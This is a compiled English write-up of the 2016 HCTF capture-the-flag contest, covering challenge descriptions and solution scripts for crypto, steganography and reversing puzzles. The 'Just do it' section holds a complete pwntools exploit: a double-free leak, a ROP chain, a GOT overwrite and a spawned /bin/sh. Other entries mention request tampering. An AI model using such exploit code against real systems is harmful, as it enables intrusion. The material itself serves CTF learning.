HCTF Writeup


Compiled from the writeups of the various teams and the official one…

Official writeup:

http://www.freebuf.com/articles/web/121778.html

FlappyPig's writeup:

http://bobao.360.cn/ctf/detail/179.html

l3m0n's web writeup:

http://www.cnblogs.com/iamstudy/articles/2016_hctf_web_writeup.html

Level-1

62pt-RE-web

Challenge description:
—I'm a man with ideals; I'd sooner do Web than reverse engineering!—Reversing is so much fun, so much fun http://139.224.54.27/yixyi/Re50.exe

10pt-MISC-Misc sign-in

Challenge description:
You actually did that behind my back……

http://139.224.54.27/webco1a/+_+.pcapng

Analyzing the pcapng in Wireshark reveals a base64-encoded string and a Python script; they are used as follows:

#!/usr/bin/env python3
# coding:utf-8
# Decrypts the base64 string from the capture with the key found next to it
# (pycryptodome's Crypto.Cipher.AES).

import base64
from Crypto.Cipher import AES


def decrypt(encrypted, passphrase):
    # The sender encrypted IV || message, so the first ciphertext block is
    # E(IV xor IV) = E(0). Using that block as the IV for CBC decryption of
    # the remaining blocks recovers the message without knowing the real IV.
    IV = encrypted[:16]
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(encrypted[16:])


def encrypt(message, passphrase):
    # Encryption side as found in the capture: the IV is the first 16 bytes
    # of the message and is encrypted together with it; the message is
    # zero-padded up to a multiple of the block size.
    IV = message[:16]
    length = 16
    count = len(message)
    padding = length - (count % length)
    message = message + b'\0' * padding
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)


IV = b'YUFHJKVWEASDGQDH'
message = IV + b'flag is hctf{xxxxxxxxxxxxxxx}'

encode_string = 'mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV90XhAOkIs/OXoYVw5uQDjVvgNA=='
flag = decrypt(base64.b64decode(encode_string), b'Qq4wdrhhyEWe4qBF')

print(flag)

10pt-Web-The flag of 2099

Challenge description:
only ios99 can get flag(Maybe you can easily get the flag in 2099
http://2099.hctf.io/

Craft the User-Agent as follows:
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 99_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25

86pt-Web-encore time

Thanks to the kind organizers for releasing this challenge at the end: get onto Google through a VPN, fill out the survey, and you receive the flag.

Level-2

34pt-Web-RESTFUL

Challenge description:
Hakurei Shrine donation box
http://jinja.hctf.io/

Modify the request in Burp Suite to PUT index.php/money/123456

94pt-MISC-pic again

Challenge description:
Coach, I want to play CTF
http://139.224.54.27/fl4g/flag.png

# coding: utf-8
# First script (embedding): write the bytes of justastart.zip, bit by bit, into
# the least significant bit of each colour channel of misc1.jpg (LSB steganography).
from PIL import Image

# Read the payload and expand it into a list of bit characters ('0' / '1')
with open("justastart.zip", "rb") as fflag:
    data = fflag.read()

flag = []
for byte in data:                       # iterating over bytes yields ints
    binnum = bin(byte)[2:].zfill(8)
    for i in range(8):
        flag.append(binnum[i])

# pop() takes from the end, so reverse first to consume the bits in file order
flag.reverse()

im = Image.open('misc1.jpg').convert("RGB")
width, height = im.size

pic = Image.new("RGB", im.size)

for y in range(height):
    for x in range(width):
        pixel = list(im.getpixel((x, y)))

        for i in range(3):
            count = pixel[i] % 2        # current LSB of this channel

            if len(flag) == 0:
                break                   # payload exhausted: copy the rest unchanged

            if count == int(flag.pop()):
                continue                # LSB already equals the bit to embed

            # otherwise flip the LSB; this never leaves the 0..255 range
            if count == 0:
                pixel[i] += 1
            elif count == 1:
                pixel[i] -= 1

        pic.putpixel((x, y), tuple(pixel))

pic.save("flag.png")
# coding: utf-8
# Second script (extraction): read the LSB of every colour channel of flag.png
# in scan order, regroup the bits into bytes and write them out as test.zip.
from PIL import Image

im = Image.open('flag.png').convert("RGB")
width, height = im.size

aa = ""                                 # the recovered bit string

for y in range(height):
    for x in range(width):
        pixel = im.getpixel((x, y))
        for i in range(3):
            aa += str(pixel[i] % 2)

a = bytearray()
for i in range(len(aa) // 8):           # every complete group of 8 bits is one byte
    a.append(int(aa[i * 8:i * 8 + 8], 2))

with open("test.zip", "wb") as fflag:
    fflag.write(bytes(a))

124pt-Web-giligili

Challenge description:
ギリギリEYEo(^▽^)┛ url
http://re4js.hctf.io/

Official writeup from the challenge author:

http://lorexxar.cn/2016/11/19/web2-giligili/

250pt-MISC-Is that all the steganography you know? →_→

Challenge description:
A junior from the communications department solved it in 10 minutes
http://139.224.54.27/Shimakaze/shimakaze.bmp

This challenge hides the information in the frequency domain, so the proper solution is very simple: three lines of code, read the image, take the FFT, display the result. Reference (MATLAB):

IM = imread('shimakaze.bmp');
IM_FFT = fft(IM);
imshow(real(uint8(IM_FFT)));

[figure: hctf-matlab-wave]
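As an added illustration (not the challenge's files or the author's code, and independent of the MATLAB lines above), the following NumPy script hides a few points in the 2-D spectrum of a constructed grey carrier, which is the kind of embedding this challenge uses, and then recovers them with the same "read, FFT, display" idea plus a simple peak detector. The names `make_carrier`, `embed_in_spectrum`, `spectrum_image` and `find_spectral_peaks` are chosen here, and the carrier is seeded noise rather than shimakaze.bmp so that it runs offline.

```python
import numpy as np


def make_carrier(height, width, seed=0):
    """Constructed carrier: mid-grey plus a little seeded noise (stands in for the BMP)."""
    rng = np.random.default_rng(seed)
    return (128 + rng.integers(0, 9, size=(height, width))).astype(np.uint8)


def embed_in_spectrum(carrier, points, spatial_amplitude=20):
    """Hide `points` as bright dots in the 2-D spectrum of the carrier.

    Each (row, col) frequency bin and its conjugate-symmetric partner receive the
    same real coefficient, so the inverse FFT stays real: the image only gains a
    faint cosine ripple of amplitude `spatial_amplitude` per point."""
    h, w = carrier.shape
    spec = np.fft.fft2(carrier.astype(float))
    # fft2 scaling: a cosine of amplitude A appears as A*N/2 in each of its two bins
    coeff = spatial_amplitude * h * w / 2.0
    for r, c in points:
        spec[r % h, c % w] += coeff
        spec[(-r) % h, (-c) % w] += coeff
    stego = np.real(np.fft.ifft2(spec))
    return np.clip(np.round(stego), 0, 255).astype(np.uint8)


def spectrum_image(image):
    """The 'read, FFT, display' step: log-magnitude spectrum, centred with fftshift,
    scaled to 0..255 so it can be saved with PIL and looked at."""
    mag = np.abs(np.fft.fftshift(np.fft.fft2(image.astype(float))))
    logmag = np.log1p(mag)
    return (255 * logmag / logmag.max()).astype(np.uint8)


def find_spectral_peaks(image, ratio=20.0):
    """Steganalysis check: frequency bins whose magnitude exceeds `ratio` times the
    median (ignoring the DC term, i.e. mean brightness) are returned as (row, col)."""
    mag = np.abs(np.fft.fft2(image.astype(float)))
    mag[0, 0] = 0.0
    threshold = ratio * np.median(mag)
    rows, cols = np.nonzero(mag > threshold)
    return sorted(zip(rows.tolist(), cols.tolist()))


if __name__ == '__main__':
    carrier = make_carrier(64, 64)
    hidden = [(5, 9), (12, 3), (20, 20)]
    stego = embed_in_spectrum(carrier, hidden)
    print('largest pixel change:', int(np.abs(stego.astype(int) - carrier.astype(int)).max()))
    print('peaks in carrier:', find_spectral_peaks(carrier))
    print('peaks in stego  :', find_spectral_peaks(stego))
```

Each hidden point shows up twice in the spectrum (the bin and its mirror), which is why the MATLAB one-liner above makes the hidden pattern visible: the spatial-domain change is a few grey levels of ripple, but in the frequency domain the coefficients stand out by orders of magnitude over the carrier's own content.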

48pt-MISC-gogogo

Challenge description:
Up Up Down Down Left Left Right Right B A B A
http://139.224.54.27/gogogo/hundouluo.nes

Enable a cheat code (Game Genie), beat the game and get the flag.

127pt-RE-The 400 points from two years ago

Challenge description:
A familiar routine, the tears of an era

http://139.224.54.27/e165421110ba03099a1c0393373c5b43/

Reverse engineering yields a system of 22 linear equations in 22 unknowns. Solve it with a script, round each of the 22 solutions to the nearest integer, and convert them to ASCII to get the flag.

#!/usr/bin/python
from sympy import *
import sys
a = Matrix([
	[8923,659,1303,1949,4447,3527,757,367,5507,7907,691,
	9629,5303,8117,9103,9391,89,3361,751,9067,5417,6829],
	[9067,1259,107,8597,4229,1213,8831,3259,269,5323,769,
	1237,5501,6763,8053,67,3163,3863,4447,5569,4357,5503],
	[9533,23,1973,8269,6961,8929,6301,2791,4861,8053,1609,
	8219,911,7583,6143,2953,7247,6131,7853,4451,7187,8629],
	[1039,389,1487,5987,937,239,3583,2897,8893,3307,7459,
	8521,9769,9689,6959,7949,9137,3461,4229,9059,7177,7643],
	[7853,6271,9371,1613,73,8243,9013,919,5387,2207,6211,
	139,5077,7211,2053,8443,4421,5717,8779,8971,6337,7159],
	[3019,8377,1613,1973,3923,8821,797,4969,7643,7297,2381,
	4679,5869,647,7411,3329,6199,7349,4969,8731,877,1039],
	[3089,9859,7159,227,271,8161,1051,5701,1259,1361,3673,
	8311,4679,7877,2621,991,9949,683,743,6079,2473,4519],
	[1259,4651,5479,4951,4657,4591,509,3821,6661,4127,2011,
	4547,7621,5261,5261,2003,4871,457,2083,4561,6947,1187],
	[4703,9629,3769,2003,1297,4283,2381,8429,7057,9371,4483,
	4099,1873,499,7583,5897,937,727,241,4799,6361,5531],
	[283,5591,151,2113,7229,307,3851,8963,2777,7757,8831,
	17,8563,1543,8243,3529,3833,2411,2897,19,3559,853],
	[9467,2207,2269,2083,7741,5801,2633,349,9257,479,331,
	7649,5393,887,6329,4243,3329,7121,4001,6043,8263,3253],
	[4993,7577,6833,661,4129,67,2791,3121,4597,8053,8147,
	1619,5801,6173,127,8179,8093,9319,1063,9157,7817,2341],
	[1493,9137,9787,617,5557,8387,4219,3301,251,3203,8443,
	2521,2887,2437,7883,5653,3907,4457,9091,523,887,8101],
	[9467,2251,9067,4153,557,4999,5669,9343,7949,7019,113,
	1801,1867,1187,3541,5527,2347,4813,3019,683,6869,5051],
	[7333,8677,3557,4099,5279,449,2099,8929,5383,1933,9157,
	6827,467,3299,443,3739,823,7499,691,2467,281,4049],
	[7489,739,9769,7963,5651,7691,947,8537,4943,1187,4651,
	9011,6359,1063,7541,9187,2551,7649,4001,3187,6199,7433],
	[5653,9349,9419,2459,2423,1823,1291,2423,3671,4673,1033,
	8389,2777,8629,6203,6673,1877,7583,5077,9227,6037,2339],
	[1663,3529,9631,6833,17,3697,4327,6053,7639,6679,797,
	3209,3191,3259,5563,5717,3181,1571,751,1163,211,4421],
	[2273,9341,8081,9311,41,4241,1279,4483,6581,6863,7583,
	4129,1543,5651,4357,9521,5557,11,7723,2441,6733,6521],
	[1171,241,9851,3583,1609,43,9281,5867,2819,5659,4493,
	223,2767,3221,6173,6947,5897,6113,6737,3989,9733,3467],
	[173,2099,2953,7243,4987,1723,2657,1213,2731,7507,
	9721,4637,9203,5407,3169,5003,8681,2,3329,5843,8017,83],
	[5119,3109,8369,7993,2927,127,5233,4783,5171,3907,1613,
	4567,3343,2617,5387,8713,7829,3559,419,9931,6067,4481]])
b = Matrix([[8667403],[7382511],[11146615],[10158207],[10479787],
	[8313243],[8299033],[7413565],[8125855],[6859047],[8439587],
	[9391249],[9589403],[8408927],[8494969],[11322819],[9463133],
	[7296675],[10556993],[8201527],[8114019],[9027821]])
# Solve a*x = b exactly (22 unknowns, one per flag character); each solution is
# rounded to the nearest integer and printed as an ASCII character.
x = a.LUsolve(b)
sys.stdout.write(''.join(chr(int(round(float(xi)))) for xi in x) + '\n')

117pt-Web-Soldiers are full of tricks

Challenge description:
Try to find as much as you can; don't let anything you see slip by
http://pics.hctf.io/home.php?key=hduisa123

289pt-Crypto-Crypto So Interesting

Challenge description:
[]~( ̄▽ ̄)~* 120.27.4.96 12000
http://139.224.54.27/03c880e4aaa75efb2200c22e5dcd996d/rsa1.py

316pt-PWN-Just do it

Challenge description:
Who needs a backstory? Just go at it 115.28.78.54 80
http://139.224.54.27/fafafafafafa/

#! /usr/bin/python
from pwn import *
context.log_level = 'debug'
target = process('pwn-f')
def create(size, string):
	target.recvuntil('quit')
	target.sendline('create ')
	target.recvuntil('size:')
	target.sendline(str(size))
	target.recvuntil('str:')
	target.send(string)
def delete(id):
	target.recvuntil('quit')
	target.sendline('delete ')
	target.recvuntil('id:')
	target.sendline(str(id))
	target.recvuntil('sure?:')
	target.sendline('yes')
create(4, 'aaa\n')
create(4, 'aaa\n')
delete(0)
delete(1)
delete(0)
create(4, '\x00')
create(0x20, 'a' * 0x16 + 'lo' + '\x2d\x00')
delete(0)
target.recvuntil('lo')
addr = target.recvline()
addr = addr[:-1]
addr = u64(addr + '\x00' * (8 - len(addr))) - 0xd2d
delete(1)
create(4, '\x00')
target.recvuntil('quit')
target.sendline('create ')
target.recvuntil('size:')
target.sendline(str(0x20))
target.recvuntil('str:')
target.send('a' * 0x18 + p64(0x00000000000011DC + addr))
print(hex(addr))
target.recvuntil('quit')
target.sendline('delete ')
target.recvuntil('id:')
target.sendline('1')
target.recvuntil('sure?:')
ropchain = p64(addr + 0x00000000000011e3) # pop rdi
ropchain += p64(addr + 0x202070)# got@malloc
ropchain += p64(addr + 0x0000000000000990)# plt@put
ropchain += p64(addr + 0x00000000000011e3)# pop rdi
ropchain += p64(1)
ropchain += p64(addr + 0x00000000000011DA)# magic
ropchain += p64(0)# rbx
ropchain += p64(1)# rbp
ropchain += p64(addr + 0x0000000000202058)# r12 -> rip got@read
ropchain += p64(8)# r13 -> rdx
ropchain += p64(addr + 0x0000000000202078)# r14 -> rsi got@atoi
ropchain += p64(0)# r15 -> rdi
ropchain += p64(addr + 0x00000000000011C0)# magic
ropchain += 'a'*8*7
ropchain += p64(addr + 0x0000000000000B65)# getInt
target.sendline('yes ' + ropchain)
addr = target.recvline()[:-1]
addr = u64(addr + '\x00' * (8 - len(addr)))
#addr = addr - 534112 + 288144
addr = addr - 537984 + 283536
print(hex(addr))
target.sendline(p64(addr)+'/bin/sh')
target.interactive()

Level-3

Must be faster than Hong Kong reporters

Challenge description:
url http://changelog.hctf.io/

guestbook

Challenge description:
just a guestbook url http://guestbook.hctf.io/

Crypto So Cool

Challenge description:
120.27.4.96 13000 – ( ゜- ゜)つロ http://139.224.54.27/0514b6fdaa863addd7dbb15c2052cb3ae6755c4a/rsa2.py

The challenge author has gone missing

Challenge description:
The challenge author was taken away right after deploying the challenge, before even handing over the binary
115.28.78.54 13455

Official source:

http://www.scs.stanford.edu/brop/

asm

Challenge description:
Assembly beginner's test 115.28.78.54 23333 http://139.224.54.27/asm/asm.tar

Click me, click me, I'm the most normal reversing challenge

Challenge description:
Putting an elephant into a fridge takes 3 steps; how many steps does it take to solve a challenge?
http://139.224.54.27/Re200/

How to master C++ in 48 hours

Challenge description:
Don't even think about it, how could that be possible?
http://139.224.54.27/mastercpp/main.cpp

The Shepherd of the Great Library

Challenge description:
url Do you like reading? Come share your favourite books. (Resources on this site are for display only and will be removed on request; please delete them within 24 hours of downloading) http://library.hctf.io/

secret area

Challenge description:
There are always some secret areas you haven't discovered yet
http://sguestbook.hctf.io/

A web player's self-cultivation

Challenge description:
The freshly set-up wp had a vulnerability, so annoying; the vulnerability was fixed but a backdoor got planted. Can you find where the backdoor is??? The archive provided is a docker image
https://mega.nz/#!xcFWXBwb!XXQCihmJiedqDbNKAaxkKNiBNAqflt9s2hbls71_b7I

flip

Challenge description:
A simple little game~
http://139.224.54.27/flip/

AT field

Challenge description:
Welcome to AT field http://atfield.hctf.io

Crypto So Amazing

Challenge description:
120.27.4.96 14000 ∑^)/ http://139.224.54.27/c4248304a16c19793e4250eaab44f85a22a7c4bb/rsa3.py

A binary player's self-cultivation

Challenge description:
Huh, binary 115.28.78.54 13455 http://139.224.54.27/weber/

Official solution:

https://en.wikipedia.org/wiki/Padding_oracle_attack

A routine you haven't been through

Challenge description:
Pentest 120.27.122.0

5-days

Challenge description:
5-days to pwn:d 115.28.78.54 12345 http://139.224.54.27/5-days/5-days.tar

AT field-2

Challenge description:
Welcome to AT field http://atfield.hctf.io

A Certain Magical Index

Challenge description:
The storm returns, staging a comeback
http://index-librorum-prohibitorum.hctf.io/
